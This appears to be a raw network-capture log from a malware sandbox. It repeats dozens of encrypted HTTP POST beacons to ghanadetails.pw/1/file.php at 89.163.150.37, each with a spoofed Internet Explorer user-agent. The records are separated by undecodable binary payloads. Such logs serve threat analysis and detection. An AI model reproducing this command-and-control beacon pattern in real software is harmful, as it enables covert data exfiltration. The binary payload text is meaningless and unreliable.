\xc4\x13\xddE5\x95\x8f\xed;MJ\x0c\x87\x17\x8f\x0b\ p\xea(\xf3N`\x16\xb8\x83\x83\xf3\xd6e\x8f\xf1\xa5/\xae\x03q:\xbe@\x80p\xa7\xf7\x8a$\xdc8\xfbM\xcf9\x14\xa7\xe6:\x8c\xaai}\xafs#\xd6\xefB\xdcW\xf2J\xc53

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

w\xbbG\xd9\x9d>)?G\xeeT\xd8:\xa6\xd5\x0e\xb7g\xd8\x8d\x96\xfa"\xbc\xa8\xa6\xbc\xc0\xfa\x92/\xa0\xe7\xc9N\xe7\xaau\xc5\x98r\x1fN\xedW\xd6!x[f\xdef\xad\xd4\x8d*	\x98\xc2\xc1\x00\xbb\xd0\x01\x88\x9f\xa2\x98\x10u2\xf2\xcek\xa4\x01\xbb[\x1c\xc4b\x9c \xb92@\xcb\xaa\x93\x81\x02\x00\xd8\xbe\x07\x87\xe8\xd7\\x91\x886\x9cj*<L\x0f\xady\xc8\x1e\xd7\x83'\xa3\xff\xe9\x95\x9b\x0c\x95{^\x8d\xca\xe7\x83\xf9\xfd7\xad^\xaez\xf5>\xccEC\x96s

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x8bY^\xca\x071\xa2V\xcb\xf7\x82\xd7\xa3
\x02\x1bI\xe9\x11
+\xb2Q\xd9\x00\xdb\x0b\x08\x8b<\xce\xecWg\x1b\xb8|6\x02\xbd\xb2J\xd4\xae\x826\xba!\xe9\xa4[\xaa\\xd0\xb2\x03\xed\xa99E=Y}\x01t}\xbb\x8b\x8az\xb9\x9bBrr\x0e"\xf7\xcb\xd1\x9c\x12\xe99\x8f\x08\xb8\xcf;\xfc\xb5\xc8\xa9\x10\xe6\xcbXy	\xce^u[O\xeai\xd6Lx\x99SGeA\xa2o\x0e\xed\xaa\xb2\xe8\xa4\x80\xda\xb0(J\x83\x05\x1f.\xbe\xc4\xa1\xf1\x9c\xb2\xd5\x93L\x0f\xdf

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xe2\xa8m\x04\xe4\xea\x1d\x0b\xa8u\x8e\x89U\x126\xc9<\x13EK^\xb6\xcd\xfe\xbeO\x1b\x0b\xb0\xd9(\x12\xc0h\xd6\x88a\x13C\x1e/6&\x0e\x8a\xd0p
b\xa0\xf1\x12\xd7*\xd0\xda\xad\xc3\xd7\xb8\xf8Be\x01\x1d\x8c\x88Ei\xa1\x06\xc6!\xf0~P\xd4\xef\xff\x03\xe9\xe8\xbd\x7f\xfa\x0c$\xe8\x85h\xa5\xcb\x92\xf5\x005\xcfv\xc4\xfeCP\x1a\xecw\x15$\xecp\x7f\x99k\xeeE\x08\xd7\x85\x17\xc8k\xa8\xcen'u3R\x83l\xee\x1dp'zN\xc1\xd1W\x9f\x12\xf9\xc7

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xe2\xc5\x95$\\xab?\xb2\xb0-\x94\xd7\xdcf\xfe3\xea\xe3\x91.\x8a\xb3\xed)f|sI\xa9\xe3 N\x83Fm\xeb\x9a\x11"\xe4t-\x7f\x13t\xbf\xef \xba\xcb\xefP\x01\x84)^\xed\x1c\x18\x16
\x94\x81\xb1\xadQ\xc0\xd5aP\x94\xcf\x89\x18\xd4\xbe\xed+\x87I\x8f\xa8\xd9\xaa\x9e\xb9\xb4\x8f\xed\xeb}9;\x7f\xb8\xd9#\xf7\xd02\x17\xfd\xd4\xb9\x83\xa1\xd2^\x15\xe7\xbd}\xd4Y0^\xba\xf9\x03W\x9c\x11\xea\x89\x80\xe5\xb63\xdc3E\xff7\x99\xce\x9f*\xe6&\xf7\xc8
\x9b\x1c\xf8

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

d\xaa;\xf6\xe3\xa4`0\xb8=\xed\xe2dfZ6$\xfd\xfb\x8eU=i|\x0c]\x82\xa7c\xf9\xddR\x195\xdf%9\x02az`!\x1a:\xd0\xa3W9h\xc9\x99\xec\xc2\x16\xb1\x17\x9b!\xf5\xe4\xdb\x92`\xb1+>n\x07\xde_\xcbM\x81\x08\xad\x8bU+#LA\xb6\xb3
A70\xda\x87\xca\x8c\xd7\xf1eE\xc5\xb9\x84b\xfc\xb4\xee\x97'\x97\xad\xb7w\xb1\xfb\x05d\x06[F\xe2yk\x9b\x1e\xea,\x07{V\xe3W3Z\\xeb-\x88\x96\x91\x1d"\xf6_\xc2p
?\x196

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\x12\xb5\x1b\x93b\x96\xd5>f\xd5\xeeH^\xd9G\x00PI\x03\x9d\xf5*\xa0\xd4<c@?X\xdd\xd3 \x1dX\x8d2\xcaB\xa6\x06\xcc\xbbk\xe2\x98n8}n\x0f\x13\x8d\x10s
\xcd\xd9mE\x0e\x92\xc4\x1c\xb1]!Nb_m~C_\xe0\xae!o\x94>z5\x02K\x19\xe1 \xf9r\xb7\xf4NO\xcaAK\xb7\xbd\xe90\xebG\xaeP[;7\xc6\xaf\xf96j \x00\x9d\xcc\x83\xab\x0e \xc4\xa8`\xb7\x91\x1f\xb5+3,C\xcbH	\xa4$\x13\xfc\x1e\hJ\xb5"/B

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

~\xdb\x1eS\xa9\xca\xb6\xc1U3\xcd\x04,^\xdfLX:\x19h\xd25\x8c\xde\xbe\xf0\x9f\xfe\xa8\xa5\x17\xe2\xaf\xe8V,\xdf\xc0\x1b'!\x83\x96p\xf9\x19.\x05\x95\x93\x03\xf4(`	<H\xff\xd06\x9bE!\x8a
tp\x99\xaf
&\x87W=\xb6V&(\x9d
\x06Jj\xd7\xfd\x04\xeeC\x0e\\xaa\xb5\x01\x02\xb4N(~\xcc\xd2u\x0b\xca]\xf1(\x1c\x1arH\x0b\x95\xf1\x17/\x8fq\xec\xf13\xd3
\x91\xa9\x164\x16\x08{\x16\xfb\xad\xea\xdc"\x8f\xaa\x9c@\x1a\x0c

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

A\x02o\xac%[\x04\x9f\xd5\x08\xc54/ \xbc\x0c\xa9p\xf7\x8d\x19\xa1\xf4\x8e\xa6\xd9)\xc3\xb8\xf5
\xa1\xd3rd\x90\x10\x12\xea:\xe2\xfb\xdd\x03\xb9$\x0e\x06'\x9a\xaeR\xa0\xb72/\x13\x95%H\xc8Vx\x8a5\xad\x01f#\x9b\x94\xd9\xd7\x06\xbef%V\xfeM\xf7\x00\x8426\x90\x96\x13\x16u\x1c\x88\x11R\xae
T\xe4\xfen\xba\xd9;@2PWi2u+\x96C\x1e\x82)\xf9;\xca \x88`d\xd7E'O\x08D\xcf\x8aRfM\x90\xd1*\xa7H*\x0f

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\xe0\xcep(\xfb\xa5\xc1\x88\x96\xe8"\xcf.&\xabU\xd0\xb9\xf3\xc4+>X\xe8\x7f\x89\xf0\xd4D+\xce\xe12\xfe;T\x8e\xacom\xe1[z\xb8\xf8bY\x1f\x1e\x13\xea[\xd2h\xde	\x8a\x85\xbc\x1ft\xc8\xfb\x8a\x94a\x1e\xe2\xfdeQ\xce\x94\xe6Y\x9d$P\xe9\x14\x8e\xc9\x80{\x04\x0f:u\xcf%\xc5\x9f\xed\x8cmM\xb5h\xa1\xaa$g\xbe\x171\xf0\xf0\xd2s3|\x8fz\x97\xc6 \x8b\xe4&\x06\x11p\xfd\x80\xf9\xb9\xcc\x08\xe5\x03\x95\xd6\xb8\xb3U\xc6iG\xaf\xd1\x0e

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\x90\xc2y\x1e\xc0\xd5\x82\xb0\xf8^\x917\xe4\xe7#m\xbf\xbbh\xaa\xb0\xa0p\xb2\xe4^\xe3\xfb\x08\xdb\xc9a\xcd}\xbd\xed:S\xa3\xda\x00bF\xcf,\xb4'\xbd\xa0\xef\x03W\xc2\xa5\xa5\x1a&0\x97\xb5\xbd\xbdy\x8f\xe1h\x12\xd1\xc3\x10\x17\xf3\xffU\xef`\xeb\x94d)\xe4\xce\x1e\x10\x9a\x94\x17*Q\xf7\xd3\xb5\xa4yo\xc8@\xe1-\x19\x9a\x92x\xaa\xda\xc3\xc6\xaf<wq2\x90\x10\xd8\xcb\x82\xe8\x9c\xce\x0f"k*$\xdf\x1eJ\xc9`

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xc8\xed\x982\xbf\xbaxI]\x16\x11\xbb\xef\x04|Fz\x9e&\x13O@\xda`R,\x8e9\xb20U\x1c\xe8/!\xbc8A$^\xd8W\xbb>Z*\x05\xeb\x18\xb70\x93@8r\xb5\xed?\x87
z+\x98\x8f\xb9G\xf3\xfd\xbc\x7f\xed
Z\x1do\xec\xe0w;\x02!\xebP\xa9et\xbd\xf8\xe7\x85\xbew\x1e\x92\xf3\xb5e\xb3\xb1H\x98\x80\xff.\x02\xf6;^J\xe9Sd(H\xeb\x0f\x00uKa\xc4-{\x95\xe3I\xffJ\x91O

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

O\x9b\xaf\xa3z\x8d\xbdB\xa5\xea\xaa\xed\xd5\xfbmX\xe3.ki\x11\xe0-O\x8a\xd4\xba\xee\x82\x13U{\x08>qJ\x9a\x11\x862G\xccg\x0f\x07\xb2s\x92\xe6`\x1a\x8ey\xff\xe2\xfdR\xa0\xd4\xba-o\xff\x8f>1\xc4lyH(\x01\xa2\xe1\xd4\xba\xda\x88*\x1c\xb8[\x1d\xd3;\xd4J\xd7?}\x8a\xa0.\xb1\xf3\xd2\x85\xa2\xe1\xbe:\xd0]B\x9dm\xe7o\x17q%\x1d\xd6\x9f\xc1\x129\xb2\xdb){\xb2(%\xb4
\x98J\x169

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xd6\xf2W\xcf\xf9\x8d-\xe8\xfa\xd2\x82\x1c\xc7\xed\xb2~\x11JGn]D\x1d\xe5\xb6\xf8\xea\x0c!\x89\xfe.\xc8\x0e\xd0\x7f@HO\xc1A\xad\x16\xa7$\x13\xc8\x86s\xc5\xcf\x0b\xe8\xe4<\xfd\x99H\x1a\x83U.\x8f\x01)\xd6\xb2\x8et\xc66%sWr\xc5F\x10{\xb4\xc4\xb1\xbfZ\xf9\xfe\xf4\xf3\x8d\xdfT\xcc\x03\xa5\xd6	\xc7\x10\xc2	b\x0b\x163\x19\x8e\x14E\xde\xbc!\xe0\xff 6\xce\xba\xd9$L\x9cE\xa3\x1c\xd8_\xb8\x83X\xb4'\xbb:\x1d~"\x83\xf0\x93\x87k8

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\xdd\x8e\xd6W\xfe\xef\xbe\xd0F\xec\xa4b\xe0R\xb3\x03\x93\xbb\x87
\x9er;\x10\xb77d\x1c+%CN\xa3\x121\x87'J\xbc\x99\x9d\xf3P\xb9c\xcc\xa9\x9b\x91To\x08K\xb2zh\xf8\xe7\xf4\xf3?\xe2R\x01"\xaa3\x16s\xa4\xa5\x1d\xcfiT\xbba\xafz\xc9F@\x7f9:\xc8\xd2\x06\x8c\x10\xda\xdc		ki\xac\x0c#\xf1\x05	\xe5k\xc5\xd0R[\x99c@\xfd\x1d\xb1\x96\xcd\x19\x8fb\xd9\xfd\xeaMl\xb2\x93e\x83S\xc8\xa6#=\x7f\xed\x1a?\xce\xb5\xf9L\x87

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

\x98\x17\xc3\xf3Q\xfb?\xa4\xb0\x14\xb0\xc9\x9a~_\xd7\xc6]GL\xd3\x96\x18d\xb8{\xa1\xed\xe8z\x12\x919T\xfb\xfcW\x81\xe22\xb4\xd4\x9b\xcd\xc6?\x9a\x90\x1bmp\x96\xd9\x89\x86\xc3(t\xee\xdd#b\xdc\x01g3&\xb2\xdc\xb0$i9\x91@\x10\x1b\x83\x96\x1d\x13\xa6\xbfxw,\xf1r\x83\\x1f-\xcaV:\xb66J\xe9\x8au\xc2\xbb\xc0\xec\xf7\x99/<\x90s\xf6\x97\x88\x89S\x8b\xb4\x9er-yWB\xae\x13\xeb\x83\x16Q\xb3\x87\x92kln\xc96\xa1R6\xab

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xaa\xbe#8O\xf0\xa4"\xc4\xae\xf8u\x1b \x12\x9a0\xd2!n\xa2\x11\xaeBP\xf6D\xf8\x18"\xb8\xd1T\xa2Dh\x16\xd5&\xeb\x9f1\x8c.,f\x9c\x16\xffe\xc0\x8f\xb6\xb9\xf5\xaaD	\xb08#\xca\x86\xb1\xe5*v\xc9r\x0b\x0f_\xfd\x9b\xb8\x1c*mk\xe0U\x99i\xea\xb6\x1b\xf7\xe4\xdbaJ\x88\x8a\xbe F\xf4\x13\xf9\xb1\x9b9\xd0\xb6h\xbd!cM>\xceK\x91\xf7\x1f\x81
\xc4\xdf\xa35\x04B\xa7\xae\xbb\xb13\x94H\xf3\xe3$\xc2U\x0f^eJU\x0fLw\xb5"

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

\xf8h1`o32wK\xea^>\x82\xcd\xb7RB \x0e\x84d\x87\xe1\xee\xf9\xfc\xe5J\xdb\xc8\x18A\x96\xe4\xc6\xa0\xa6\x86 .\x80\xe5\xba\xf5%\x1b\xa9N\x1d\x07\x7f\xf5\xe0\xbf*\x96}\x93\x81\x1ap\xb0\xb6\xb1\xb7\xfcd\x91R\xc8\x99
r\xdf\x1eW\xb3\x80\xce('kF\x00p\x8d\xb8Hrk\xeb:IT\x80\xd66U{y+j\xd6swi\x17\xb8DC\xfb\x13s\x95\xa0\xfb[\xc2\x00\x9f\x0c\x9es\x85\xfd\xc1\x813\xc6\x9e\xe1\xbb\x04\x01\xc3Z\xd1!\xec\x1e\x96\xa1\xd2}P

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 145
Connection: Keep-Alive
Cache-Control: no-cache

75:\xcd\x82S\x18E\x8e\xaf\xe0P\xad\xea\xf0\xa71\xb5\x1bMx&\xc8aocy\xce_\xc5V\xad\xb5U!\xe1\xa7
\xe6\xf0\xa9L\xe8w\xe6\xd0\x02W\x82~\x86\xd0\x10\xf2\xef\xf5\x07\xe0\xf1r\x18Q\x14\xb1x\xa1o<\xbf\xa8\xb38\xb7\x9a\xa09\x9c\xa7\x89\xddT\xfeS\xc9l,\x91\xc7\xe4\xf4w\xbe\xcdY\xce:\x15\xe4\x9c8*\xe6\x10\xad^\xc0E:\x87\x88P
\xec\xecY\xde\xab\x8f\xc5\xfcv\xed\x03\xed\x95 #3	\xc3\xea\x16\xe9a\xe9h\x14dRp\xb9\x86\x95\x88#

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\x15\xc0\x84\xda3\xf5\xa5P\x87\x04\xa7\xda\xca\xdb%\xec\x15\x18\x07\xbd\x1bP\xa1\xd3(\x13\x7fT~\xa2\xe3\xba\x9c\xab\x94\xfd\x1d\xa7P\xee\xab\xec\xa4\xf6G\xc4\x8c\xfd\x80\xe9Ey\xb9]|i\x86Dh\xc4\x15\x1a\x8d\x8aao\xea\x10555\x16\x85
\xdc\x88\xc0\xadg\xadKht\x024a\xc3N\x98\xbfJ\x1f\xd7\x05@\x16\x1b=\x0e\x03\xb7l\x81\x94{G.\x9c\xcc\x95\xa9m\xe4mi\x02\xe0\xd1\x84f\x1d\xb1)[\x98k\xba\x08\x10
a$p\xe31\x1ex\xab*\xc4\xea

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

lp\xbe\x0c\xa3,+BW\xc2\xf4\xf3\xd8\xa1\x80\xcd\x96\xfc\x83\xf9b\xdb\x9a\xc5\x94+e\x8aSU\x92d;\xc5p\xf5S\xa0\x00"\xa5\xf4)\x01\x8b`\xf7\x02\xdd\xd3\x1f\xe3\x1e\x08\x99\xa1\xe4\xa2\xac\xc4\xe63"\x8a\x18\xdf\xd0\xc6\xa5\xec\xbb\x04U\xcc\x8f\xa1\xd2\xd7\xc2\x8c\xc8\x8c\xf0FM\xea\xf8X$\x87P\xc1\xfa\xf21\xc8\xbcS\xea\x0b\xf9k\xd1Xu_\xa3k\x001\xd2\x92\xb9W3\x98G\x84a\xae\x7fW\xed[kB\x15\x08i\xbd[\xf2\xe0:\xbf\x0c\xa8my\xed\xf8

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 141
Connection: Keep-Alive
Cache-Control: no-cache

\x8d$-\x14\xf3\xbe0\x0e,\xf0\xe65&rX(\xd9=\xb4\xd1\xe0\xe5\x84\xbcC\x81\xf46c\xf43\xffA
xv\x98\xa9\x80\xf5E]\xa0\\xee(\xb4|	\x89\xb3P\x07\xad\x1cC\xa8\x93\xa6\xe3M	\x18\x8a\xf9\x8bC\xde\xf5~\xa0H.\xfe\x9dg,\x04\x1ai\x87M\xc7n\xcf\xd4\xe6!\xf3-\xc1}\xcaS\x90S\xc6\x9c\xe2\x882bQ\x8f\x95\xf6*6ey\x91\xecm
\x9f+^!\xe4L3f\xe7|\xc0x/\x08\x88\xe9\xc8\xea\xb0\xa8\xa4@\xd3_k+\x06

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xab\x89\xf7\xb0\xa8\xd2\xf1\xce\x15\x8cA\x92\xff\xac\x04\x9f\xfd\xa8\xea\xc4\x82ysSk\xf5\x94vQf\xba\xb5"\xe2\xe7\x97\x86\x80\x04p9dB\xbe\xe3+\xd4\x9b6(U\xed$\xa8r/}O4\xec0\xd4\xde\x8f\xda#\x9c\x7f\xab\x17d\x8d\x12\x87?\xc5\xf0\xdfC\xdb\xa6\xdd\x9c~\xa8M\x14\xcb\xde\\xa48\xfd\xc4\x1c\x1c\xaf~wc&A\xdf\x00\xe3\xc5\xc2\xde\xf3\xe8\x82\x14\x06\xd7\x8eqd\xe5K\xfbT]\xc8s\xa9\xb6\xb9J\xf2+

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

\xb2z\xce\x8a\xcf\xd9\x83\xc4\x88\x1cc\x80\xd0\x01:\xa4"\xc3\I\xe14\xd4z\xe1J\x02,\xc2\xeae\xe4j@\x8f\xfc\xb0\xda'+\xf5\xa51\xfd\x9d\xd7\xbb\xf1\xb8\x12\xb21\x16\xb4\x84W\xa6\xa1\xf3\xe7\xf2	P\x8f\xc3\xd0\xa5E\xcc\x1c\x16\x87\x8f\x17\x1d\xd7\xdfr}\xe0y\xb6*\xf3\xcb\x00\xb3\xe2T\xe32bnH\xc3M\xe7\xdc\x1f\x08\x10\x1b\xfc[/\x04\xb1\x9d\x8d\x14\xed~\x88\xedi\xadV\xf9\xbd\x83\x8f\xb3\x0fxkk7J\xeb\xd8

http://ghanadetails.pw/1/file.php
  • Hostname: ghanadetails.pw
  • IP Address: 89.163.150.37
  • Port: 80
  • Count: 1

POST /1/file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ghanadetails.pw
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

